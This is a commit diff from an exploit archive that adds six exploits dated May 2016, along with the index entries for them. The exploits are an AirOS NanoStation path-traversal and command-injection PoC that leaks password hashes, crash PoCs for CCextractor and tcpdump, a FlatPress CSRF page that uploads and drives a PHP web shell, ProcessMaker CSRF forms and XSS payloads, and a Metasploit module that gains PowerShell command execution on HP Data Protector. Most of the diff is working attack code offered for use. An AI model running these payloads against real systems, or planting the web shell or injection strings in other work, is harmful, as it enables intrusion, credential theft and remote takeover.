DB: 2016-06-01

6 new exploits

FlatPress 1.0.3 - CSRF Arbitrary File Upload
AirOS NanoStation M2 5.6-beta - Multiple Vulnerabilities
ProcessMaker 3.0.1.7 - Multiple vulnerabilities
CCextractor 0.80 - Crash PoC
Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (msf)
TCPDump 4.5.1 - Crash PoC

files.csv

@@ -36051,3 +36051,9 @@ id,file,description,date,author,platform,type,port
 39867,platforms/multiple/dos/39867.py,"MySQL 5.5.45 - procedure analyse Function Denial of Service",2016-05-30,"Osanda Malith",multiple,dos,0
 39868,platforms/php/webapps/39868.txt,"Open Source Real Estate Script 3.6.0 - SQL Injection",2016-05-30,"Meisam Monsef",php,webapps,80
 39869,platforms/lin_x86-64/shellcode/39869.c,"Linux x86_64 XOR Encode execve Shellcode",2016-05-30,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
+39870,platforms/php/webapps/39870.html,"FlatPress 1.0.3 - CSRF Arbitrary File Upload",2016-05-31,LiquidWorm,php,webapps,80
+39871,platforms/cgi/webapps/39871.txt,"AirOS NanoStation M2 5.6-beta - Multiple Vulnerabilities",2016-05-31,"Pablo Rebolini",cgi,webapps,80
+39872,platforms/php/webapps/39872.txt,"ProcessMaker 3.0.1.7 - Multiple vulnerabilities",2016-05-31,"Mickael Dorigny",php,webapps,80
+39873,platforms/linux/dos/39873.py,"CCextractor 0.80 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0
+39874,platforms/windows/remote/39874.rb,"Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (msf)",2016-05-31,"Ian Lovering",windows,remote,0
+39875,platforms/linux/dos/39875.py,"TCPDump 4.5.1 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0

platforms/cgi/webapps/39871.txt

@@ -0,0 +1,46 @@
+# AirOS NanoStation M2 v5.6-beta 
+# Arbitrary File Download & Remote Command Execution
+# Tested on: XM.v5.6-beta5.24359.141008.1753 - Build: 2435
+#            Linux Awesome 2.6.32.63 #1 Wed Oct 8 17:54:30 EEST 2014 mips unknown
+#
+# Date: May 30, 2016
+# Informer: Pablo Rebolini - <rebolini.pablo[x]gmail.com>
+
+# Valid credentials are required !.
+# Most of devices run default factory user/passwd combination (ubnt:ubnt)
+
+# Take a look at /usr/www/scr.cgi 
+  <?
+    include("lib/settings.inc");
+    include("lib/system.inc");
+
+    $filename = $fname + ".sh";
+    $file = $fname + $status;
+    
+    header("Content-Type: application/force-download");
+    header("Content-Disposition: attachment; filename=" + $filename);
+      
+    passthru("cat /tmp/persistent/$file");
+    exit;
+
+
+# Arbitrary File Download
+# Poc:
+  GET http://x.x.x.x/scr.cgi?fname=../../../../../etc/passwd%00&status=
+
+  Raw Response: dWJudDpWdnB2Q3doY2NGdjZROjA6MDpBZG1pbmlzdHJhdG9yOi9ldGMvcGVyc2lzdGVudDovYmluL3NoCm1jdXNlcjohVnZERThDMkVCMTowOjA6Oi9ldGMvcGVyc2lzdGVudC9tY3VzZXI6L2Jpbi9zaAo=
+  
+  Base64 Decoded: ubnt:VvpvCwhccFv6Q:0:0:Administrator:/etc/persistent:/bin/sh
+                  mcuser:!VvDE8C2EB1:0:0::/etc/persistent/mcuser:/bin/sh
+
+
+# Remote Command Execution:
+# Poc:
+
+  GET http://x.x.x.x/scr.cgi?fname=rc.poststart.sh;cat%20/etc/hosts%00&status=
+
+  Raw Response: MTI3LjAuMC4xCWxvY2FsaG9zdC5sb2NhbGRvbWFpbglsb2NhbGhvc3QK
+  
+  Base64 Decoded: 127.0.0.1	localhost.localdomain	localhost
+
+  

platforms/linux/dos/39873.py

@@ -0,0 +1,43 @@
+# Exploit Title: CCextractor 0.80 Access Violation Crash
+# Date: 31st May 2016
+# Exploit Author: David Silveiro (Xino.co.uk)
+# Vendor Homepage: http://www.ccextractor.org/
+# Software Link: http://www.ccextractor.org/download-ccextractor.html
+# Version: 0.80
+# Tested on: Ubuntu 14 LTS
+# CVE : 0 day
+
+from subprocess import call
+from shlex import split
+from time import sleep
+
+
+def crash():
+
+    command = './ccextractor crash'
+
+    buffer = '\x00\x00\x00\x04ssixssixs'
+
+    with open('crash', 'w+b') as file:
+        file.write(buffer)
+
+    try:
+        call(split(command))
+        print("Exploit successful!             ")
+
+    except:
+        print("Error: Something has gone wrong!")
+
+
+def main():
+
+    print("Author:   David Silveiro                         ")
+    print("   CCextractor 0.80 Access Violation Crash       ")
+
+    sleep(2) 
+
+    crash()
+ 
+
+if __name__ == "__main__":
+    main()

platforms/linux/dos/39875.py

@@ -0,0 +1,50 @@
+# Exploit Title: tcpdump 4.5.1 Access Violation Crash
+# Date: 31st May 2016
+# Exploit Author: David Silveiro
+# Vendor Homepage: http://www.tcpdump.org
+# Software Link: http://www.tcpdump.org/release/tcpdump-4.5.1.tar.gz
+# Version: 4.5.1
+# Tested on: Ubuntu 14 LTS
+
+from subprocess import call
+from shlex import split
+from time import sleep
+
+
+def crash():
+
+    command = 'tcpdump -r crash'
+
+    buffer     =   '\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\xf5\xff'
+    buffer     +=  '\x00\x00\x00I\x00\x00\x00\xe6\x00\x00\x00\x00\x80\x00'
+    buffer     +=  '\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00<\x9c7@\xff\x00'
+    buffer     +=  '\x06\xa0r\x7f\x00\x00\x01\x7f\x00\x00\xec\x00\x01\xe0\x1a'
+    buffer     +=  "\x00\x17g+++++++\x85\xc9\x03\x00\x00\x00\x10\xa0&\x80\x18\'"
+    buffer     +=  "xfe$\x00\x01\x00\x00@\x0c\x04\x02\x08\n', '\x00\x00\x00\x00"
+    buffer     +=  '\x00\x00\x00\x00\x01\x03\x03\x04'
+
+
+    with open('crash', 'w+b') as file:
+        file.write(buffer)
+
+    try:
+        call(split(command))
+        print("Exploit successful!             ")
+
+    except:
+        print("Error: Something has gone wrong!")
+
+
+def main():
+
+    print("Author:   David Silveiro                           ")
+    print("   tcpdump version 4.5.1 Access Violation Crash    ")
+
+    sleep(2)
+
+    crash()
+
+
+if __name__ == "__main__":
+    main()
+

platforms/php/webapps/39870.html

@@ -0,0 +1,146 @@
+<!DOCTYPE html>
+<!--
+
+
+FlatPress 1.0.3 CSRF Arbitrary File Upload
+
+
+Vendor: Edoardo Vacchi
+Product web page: http://www.flatpress.org
+Affected version: 1.0.3
+
+Summary: FlatPress is a blogging engine that saves your posts as
+simple text files. Forget about SQL! You just need some PHP.
+
+Desc: The vulnerability is caused due to the improper verification
+of uploaded files via the Uploader script using 'upload[]' POST parameter
+which allows of arbitrary files being uploaded in '/fp-content/attachs'
+directory. The application interface allows users to perform certain
+actions via HTTP requests without performing any validity checks to
+verify the requests. This can be exploited to perform actions with
+administrative privileges if a logged-in user visits a malicious
+web site resulting in execution of arbitrary PHP code by uploading
+a malicious PHP script file and execute system commands.
+
+Tested on: Apache/2.4.10
+           PHP/5.6.3
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2016-5328
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5328.php
+
+
+04.04.2016
+
+-->
+
+
+<html>
+<title>FlatPress 1.0.3 CSRF Arbitrary File Upload RCE PoC</title>
+<body>
+
+<script type="text/javascript">
+
+function exec(){
+  var command = document.getElementById("exec");
+  var url = "http://localhost/flatpress/fp-content/attachs/test.php?cmd=";
+  var cmdexec = command.value;
+  window.open(url+cmdexec,"ZSL_iframe");
+}
+
+function upload(){
+  var xhr = new XMLHttpRequest();
+  xhr.open("POST", "http://localhost/flatpress/admin.php?p=uploader&action=default", true);
+  xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
+  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8");
+  xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundary1Ix0O1LgWmzQa0af");
+  xhr.withCredentials = true;
+  var body = "------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" + 
+    "Content-Disposition: form-data; name=\"_wpnonce\"\r\n" + 
+    "\r\n" + 
+    "5a462c73ac\r\n" + 
+    "------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" + 
+    "Content-Disposition: form-data; name=\"_wp_http_referer\"\r\n" + 
+    "\r\n" + 
+    "/flatpress/admin.php?p=uploader\r\n" + 
+    "------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" + 
+    "Content-Disposition: form-data; name=\"upload[]\"; filename=\"test.php\"\r\n" + 
+    "Content-Type: application/octet-stream\r\n" + 
+    "\r\n" + 
+    "\x3c?php\r\n" + 
+    "system($_REQUEST[\'cmd\']);\r\n" + 
+    "?\x3e\r\n" + 
+    "------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" + 
+    "Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" + 
+    "Content-Type: application/octet-stream\r\n" + 
+    "\r\n" + 
+    "\r\n" + 
+    "------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" + 
+    "Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" + 
+    "Content-Type: application/octet-stream\r\n" + 
+    "\r\n" + 
+    "\r\n" + 
+    "------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" + 
+    "Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" + 
+    "Content-Type: application/octet-stream\r\n" + 
+    "\r\n" + 
+    "\r\n" + 
+    "------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" + 
+    "Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" + 
+    "Content-Type: application/octet-stream\r\n" + 
+    "\r\n" + 
+    "\r\n" + 
+    "------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" + 
+    "Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" + 
+    "Content-Type: application/octet-stream\r\n" + 
+    "\r\n" + 
+    "\r\n" + 
+    "------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" + 
+    "Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" + 
+    "Content-Type: application/octet-stream\r\n" + 
+    "\r\n" + 
+    "\r\n" + 
+    "------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" + 
+    "Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" + 
+    "Content-Type: application/octet-stream\r\n" + 
+    "\r\n" + 
+    "\r\n" + 
+    "------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" + 
+    "Content-Disposition: form-data; name=\"upload\"\r\n" + 
+    "\r\n" + 
+    "Upload\r\n" + 
+    "------WebKitFormBoundary1Ix0O1LgWmzQa0af--\r\n";
+  var aBody = new Uint8Array(body.length);
+  for (var i = 0; i < aBody.length; i++)
+    aBody[i] = body.charCodeAt(i); 
+    xhr.send(new Blob([aBody]));
+}
+
+</script>
+
+<h3>FlatPress 1.0.3 CSRF Arbitrary File Upload RCE PoC Script</h3>
+
+<form action="#">
+  <button type="button" onclick=upload()>Upload test.php file!</button>
+</form><br />
+
+<form action="javascript:exec()">
+  <input type="text" id="exec" placeholder="Enter a command">
+  <input type="submit" value="Execute!">
+</form><br />
+
+<iframe
+  style="border:2px;border-style:dashed;color:#d3d3d3"
+  srcdoc="command output frame"
+  width="700" height="600"
+  name="ZSL_iframe">
+</iframe>
+<br />
+<font size="2" color="#d3d3d3">ZSL-2016-5328</font>
+
+</body>
+</html>

platforms/php/webapps/39872.txt

@@ -0,0 +1,126 @@
+######################################################################
+# Exploit Title: ProcessMaker v3.0.1.7 Multiple vulnerabilities
+# Date: 31/05/2016
+# Author: Mickael Dorigny @ information-security.fr
+# Vendor or Software Link: http://www.processmaker.com/
+# Version: 3.0.1.7 
+# Category: Multiple Vulnerabilities
+######################################################################
+
+ProcessMaker description :
+======================================================================
+ProcessMaker Inc. is the developer of the ProcessMaker Workflow & BPM Software Suite. ProcessMaker automates form based, approval driven workflow that improves the way information flows between data and systems. ProcessMaker has been downloaded more than 750,000 times and is currently being used by thousands of companies around the world. ProcessMaker has a network of more than 35 partners located on 5 different continents.
+
+Vulnerabilities description :
+======================================================================
+ProcessMaker v3.0.1.7 is vulnerable to multiple vulnerabilities like :
+- Reflected XSS
+- Stored XSS
+- CSRF (x2)
+
+PoC n°1 -  CSRF on Designer Project Creation
+======================================================================
+Designer Project creation process is vulnerable to CSRF vulnerability. a forged request can be used to force an authentified user with designer project creation rights to create a new Designer project. 
+
+PoC: 
+
+[REQUEST]
+http://server/sysworkflow/en/neoclassic/processProxy/saveProcess?type=bpmnProject
+[POSTDATA]
+PRO_TITLE=AAA&PRO_DESCRIPTION=BBB&PRO_CATEGORY=
+
+The following HTML form can be used to exploit this CSRF vulnerability when mixed to phishing technics or auto-submit javascript tricks : 
+
+<form method=POST name=form1 action="http://serversysworkflow/en/neoclassic/processProxy/saveProcess?type=bpmnProject">
+        <input type=text name=PRO_TITLE value=XXX>
+        <input type=text name=PRO_DESCRIPTION value=XXX>
+        <input type=text name=PRO_CATEGORY value="">
+        <input type=submit>
+</form>
+<script>
+window.onload = function(){
+  document.forms['form1'].submit()
+}
+</script>
+
+Note that this CSRF vulnerability can be combined with the PoC n°3 that expose a stored XSS vulnerability in the Description input of Designer Project.
+
+Proof of Concept n°2 - CSRF on group creation
+======================================================================
+Group creation process is vulnerable to CSRF vulnerability, a forged request can be used to force an authentified user with admin rights to create a new group.
+
+PoC : 
+[REQUEST]
+http://server/sysworkflow/en/neoclassic/groups/groups_Ajax?action=saveNewGroup
+[POSTDATA]
+name=swdcs&status=1
+
+The following HTML form can be used to exploit this CSRF vulnerability when mixed to phishing technics or auto-submit javascript tricks : 
+
+<form method=POST name=form1 action="http://192.168.1.14/sysworkflow/en/neoclassic/groups/groups_Ajax?action=saveNewGroup">
+  <input type=text name=name value=2>
+  <input type=text name=status value=1>
+  <input type=submit>
+</form>
+<script>
+window.onload = function(){
+  document.forms['form1'].submit()
+}
+</script>
+
+
+Proof of Concept n°3  -  Stored XSS on Designer Project Creation
+======================================================================
+The "description" input of the designer project creation process is vulnerable to stored XSS. A user can use this input to store an XSS an make other user's browsers executes controlled JavaScript instructions.
+
+PoC
+[REQUEST]
+http://server/sysworkflow/en/neoclassic/processProxy/saveProcess?type=bpmnProject
+[POSTDATA]
+PRO_TITLE=AA<img src=x onerror=alert(1)>A&PRO_DESCRIPTION=BBB&PRO_CATEGORY=
+
+Note that this CSRF vulnerability can be combined with the PoC n°1 that expose a CSRF vulnerability in the Designer Project creation process. 
+
+Through this vulnerability, an attacker could tamper with page rendering or redirect victim to fake login page
+
+Proof of Concept n°4 - Reflected Cross-Site Scripting (RXSS) with authentication :
+======================================================================
+The search form in the Design Project can redirect user to a blank page without HTML code. This page display some information including user request. We can use this situation to execute JavaScript instruction into browser's user.
+
+Note that a search request use POST transmission method, to exploit this vulnerability, an attacker need to trap a user to visit a HTML form with auto-submit Javascript tricks to generate the forged request.
+
+PoC :
+
+[REQUEST]
+http://server/sysworkflow/en/neoclassic/processes/processesList
+[POSTDATA]
+processName=<img src=x onerror=alert(1);>&start=0&limit=25&category=%3Creset%3E
+
+Through this vulnerability, an attacker could tamper with page rendering or redirect victim to fake login page.
+
+Solution: 
+======================================================================
+
+- Update your Process Manager installation to superior version
+ 
+Additional resources :
+======================================================================
+- https://www.youtube.com/watch?v=TO2Fu-pbLI8
+- http://www.processmaker.com/
+
+Report timeline :
+======================================================================
+2016-01-26 : Editor informed for vulnerabilities
+2016-01-27 : Editor response, fixes will be part of the next release
+2016-05-25 : 3.0.1.8 is released with vulnerabilities corrections
+2016-05-31 : Advisory release
+
+Credits :
+======================================================================
+Mickael Dorigny - Security Consultant @ Synetis | Information-Security.fr
+
+My Packet Storm Security profile : https://packetstormsecurity.com/files/author/12112/
+
+--
+SYNETIS 
+CONTACT: www.synetis.com | www.information-security.fr

platforms/windows/remote/39874.rb

@@ -0,0 +1,144 @@
+# Exploit Title: Data Protector Encrypted Communications
+# Date: 26-05-2016
+# Exploit Author: Ian Lovering
+# Vendor Homepage: http://www8.hp.com/uk/en/software-solutions/data-protector-backup-recovery-software/
+# Version: A.09.00 and earlier
+# Tested on: Windows Server 2008
+# CVE : CVE-2016-2004
+#
+
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/exploit/powershell'
+
+require 'openssl'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Powershell
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "HP Data Protector Encrypted Communication Remote Command Execution",
+      'Description'    => %q{
+        This module exploits a well known remote code exection exploit after establishing encrypted control communications with a Data Protector agent. This allows exploitation of Data Protector agents that have been configured to only use encrypted control communications. This exploit works by executing the payload with Microsoft PowerShell so will only work against Windows Vista or newer. Tested against Data Protector 9.0 installed on Windows Server 2008 R2."
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [ 'Ian Lovering' ],
+      'References'     =>
+        [
+          [ 'CVE', '2016-2004' ],
+        ],
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X86_64 ] } ]
+        ],
+      'Payload'        =>
+        {
+          'BadChars' => "\x00"
+        },
+      'DefaultOptions'  =>
+        {
+          'WfsDelay' => 30,
+          'RPORT' => 5555
+        },
+      'Privileged'     => false,
+      'DisclosureDate' => "Apr 18 2016",
+      'DefaultTarget'  => 0))
+  end
+
+  def check
+    # For the check command
+    connect
+    sock.put(rand_text_alpha_upper(64))
+    response = sock.get_once(-1)
+    disconnect
+
+    if response.nil?
+      return Exploit::CheckCode::Safe
+    end
+
+    service_version = Rex::Text.to_ascii(response).chop.chomp
+
+    if service_version =~ /HP Data Protector/
+      print_status(service_version)
+      return Exploit::CheckCode::Detected
+    end
+
+    Exploit::CheckCode::Safe
+
+  end
+
+  def generate_dp_payload
+
+    command = cmd_psh_payload(
+      payload.encoded,
+      payload_instance.arch.first,
+      { remove_comspec: true, encode_final_payload: true })
+
+    payload =
+      "\x32\x00\x01\x01\x01\x01\x01\x01" +
+      "\x00\x01\x00\x01\x00\x01\x00\x01" +
+      "\x01\x00\x20\x32\x38\x00\x5c\x70" +
+      "\x65\x72\x6c\x2e\x65\x78\x65\x00" +
+      "\x20\x2d\x65\x73\x79\x73\x74\x65" +
+      "\x6d('#{command}')\x00"
+
+    payload_length = [payload.length].pack('N')
+
+    return payload_length + payload
+  end
+
+  def exploit
+    # Main function
+    encryption_init_data =
+      "\x00\x00\x00\x48\xff\xfe\x32\x00\x36\x00\x37\x00\x00\x00\x20\x00" +
+      "\x31\x00\x30\x00\x00\x00\x20\x00\x31\x00\x30\x00\x30\x00\x00\x00" +
+      "\x20\x00\x39\x00\x30\x00\x30\x00\x00\x00\x20\x00\x38\x00\x38\x00" +
+      "\x00\x00\x20\x00\x6f\x00\x6d\x00\x6e\x00\x69\x00\x64\x00\x6c\x00" +
+      "\x63\x00\x00\x00\x20\x00\x34\x00\x00\x00\x00\x00"
+
+    print_status("Initiating connection")
+
+    # Open connection
+    connect
+
+    # Send init data
+    sock.put(encryption_init_data)
+    begin
+      buf = sock.get_once
+    rescue ::EOFError
+    end
+
+    print_status("Establishing encrypted channel")
+
+    # Create TLS / SSL context
+    sock.extend(Rex::Socket::SslTcp)
+    sock.sslctx  = OpenSSL::SSL::SSLContext.new(:SSLv23)
+    sock.sslctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
+
+    sock.sslctx.options = OpenSSL::SSL::OP_ALL
+
+    # Enable TLS / SSL
+    sock.sslsock = OpenSSL::SSL::SSLSocket.new(sock, sock.sslctx)
+    sock.sslsock.connect
+
+    print_status("Sending payload")
+
+    # Send payload
+    sock.put(generate_dp_payload(), {timeout: 5})
+
+    # Close socket
+    disconnect
+
+    print_status("Waiting for payload execution (this can take up to 30 seconds or so)")
+  end
+
+end